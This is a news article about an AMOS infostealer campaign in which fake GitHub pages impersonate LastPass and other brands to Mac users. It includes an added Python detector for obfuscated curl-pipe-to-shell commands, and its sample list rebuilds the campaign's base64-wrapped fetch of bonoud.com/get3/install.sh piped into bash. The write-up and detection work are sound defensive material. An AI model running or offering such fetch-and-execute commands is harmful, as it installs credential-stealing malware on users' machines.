Cybersecurity researchers are sounding the alarm for Mac users regarding a concerning malware campaign that has emerged on GitHub. Attackers are masquerading as reputable companies, creating deceptive pages to spread an infostealer that jeopardizes both financial and personal data.
This warning comes from the LastPass Threat Intelligence, Mitigation, and Escalation (TIME) analysts, who first detected two fraudulent GitHub pages on September 16, 2025. These pages, created under the username “modhopmduck476,” falsely claimed to offer LastPass software for Mac. Although these specific pages have since been removed, the incident underscores a larger, evolving threat landscape.
The attack begins when an unsuspecting user clicks a link labeled “Install LastPass on MacBook.” That link redirects to hxxps://ahoastock825.github.io/.github/lastpass, which in turn leads to macprograms-pro.com/mac-git-2-download.html. On this final page, users are instructed to paste a command into the Mac’s Terminal. The command uses curl to retrieve a base64-encoded URL, which decodes to bonoud.com/get3/install.sh. That script then downloads an “Update” payload and installs the malware in the system’s Temp directory.
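The chain above (a pasted Terminal command, a base64-obfuscated URL, a script piped into a shell) leaves a recognisable trace in shell history and process-audit logs. The following detector is an added example written for this article; it is not code from LastPass or the researchers. It decodes base64-looking tokens in a command line, looks for fetch-and-pipe-to-shell and base64-decode patterns, and matches any hostname it finds (visible or decoded) against the domains the article names. The sample command lines are constructed, and the placeholder host `example.invalid` is an assumption.

```python
"""Flag curl-pipe-to-shell and base64-obfuscated download commands.

Added example for this article, not code from LastPass or the researchers.
Input is a few constructed command lines of the kind found in ~/.zsh_history
or an EDR process-audit log; the indicator domains are the ones the article names.
"""
import base64
import binascii
import re

# Domains the article names as part of the campaign (page-provided indicators).
CAMPAIGN_DOMAINS = {"bonoud.com", "macprograms-pro.com", "ahoastock825.github.io"}

FETCH = re.compile(r"\b(?:curl|wget)\b")
# GNU base64 uses -d/--decode, macOS base64 historically uses -D.
DECODER = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
HOSTNAME = re.compile(r"(?i)\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b")


def decoded_blobs(cmd: str) -> list[str]:
    """Return printable text hidden in base64-looking tokens of a command line."""
    out = []
    for tok in B64_TOKEN.findall(cmd):
        try:
            raw = base64.b64decode(tok, validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64, e.g. a long hex hash or file name
        if raw.isascii() and raw.decode("ascii").isprintable():
            out.append(raw.decode("ascii"))
    return out


def analyze(cmd: str) -> dict:
    """Classify one command line as 'benign', 'suspicious' or 'ioc-match'."""
    # Hostname matching runs over the visible text plus anything we decoded.
    visible_and_decoded = cmd + " " + " ".join(decoded_blobs(cmd))
    hosts = {h.lower() for h in HOSTNAME.findall(visible_and_decoded)}
    result = {
        "fetch": bool(FETCH.search(cmd)),
        "decoder": bool(DECODER.search(cmd)),
        "pipe_to_shell": bool(PIPE_TO_SHELL.search(cmd)),
        "iocs": sorted(hosts & CAMPAIGN_DOMAINS),
    }
    if result["iocs"]:
        result["verdict"] = "ioc-match"
    elif result["pipe_to_shell"] and (result["fetch"] or result["decoder"]):
        # Generic behaviour worth reviewing even with no known indicator present.
        result["verdict"] = "suspicious"
    else:
        result["verdict"] = "benign"
    return result


def scan(commands: list[str]) -> list[tuple[str, str]]:
    """Run analyze() over a list of command lines and return (verdict, cmd) pairs."""
    return [(analyze(c)["verdict"], c) for c in commands]


# Constructed samples. The base64 blob is built here from the URL the article
# says the obfuscated command decodes to, so it is an exact stand-in for that step.
_ENCODED = base64.b64encode(b"https://bonoud.com/get3/install.sh").decode()
SAMPLE_COMMANDS = [
    "ls -la /tmp",
    "git clone https://example.invalid/tools/repo.git",
    "curl -fsSL https://example.invalid/setup.sh | bash",
    f'curl -fsSL "$(echo {_ENCODED} | base64 -d)" | bash',
]

if __name__ == "__main__":
    for verdict, cmd in scan(SAMPLE_COMMANDS):
        print(f"{verdict:10} {cmd}")
```

The hostname match against the decoded text is what turns the obfuscation into a liability for the attacker: the base64 wrapper hides the domain from a plain string search but not from a scanner that decodes first. The generic "fetch or decode, then pipe to a shell" rule catches the same behaviour before a new domain has been added to an indicator list, which matters given that the article notes the attackers re-register under new aliases.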
Malware Insights
The malware in question is known as Atomic Stealer (AMOS), an infostealer that has been operational since April 2023 and is utilized by financially motivated cybercriminals. This campaign is not limited to a single brand; investigators have linked it to counterfeit repositories impersonating well-known companies such as 1Password, Robinhood, Citibank, Docker, Shopify, and Basecamp. The primary aim of these attacks is to pilfer sensitive user data, including credentials and financial information.
To broaden their reach and ensure persistence, the attackers register multiple GitHub usernames to evade takedowns. They also leverage Search Engine Optimization (SEO) techniques to manipulate search results on Google and Bing, pushing malicious links higher in rankings. This strategy increases the likelihood that users searching for legitimate software will inadvertently land on these fraudulent pages instead of official download sites.
In response, LastPass has stated that it is “actively monitoring” the campaign, working on takedowns, and sharing indicators of compromise to assist other organizations in detecting the threat. The attackers’ methods illustrate how swiftly fraudulent repositories can be created on platforms like GitHub, taken down, and then reestablished under new aliases. This cyclical behavior presents a persistent challenge for community-driven platforms in maintaining security.
To safeguard against these risks, users are advised to implement the following safety measures:
- Download software exclusively from verified, official sources.
- Avoid executing commands copied from unfamiliar websites.
- Keep macOS and all installed software fully updated.
- Utilize antivirus software that offers ransomware protection.
- Enable regular system backups for data recovery.
- Remain skeptical of unexpected links, emails, and pop-ups.
- Monitor official advisories from software vendors.
- Employ strong, unique passwords combined with two-factor authentication.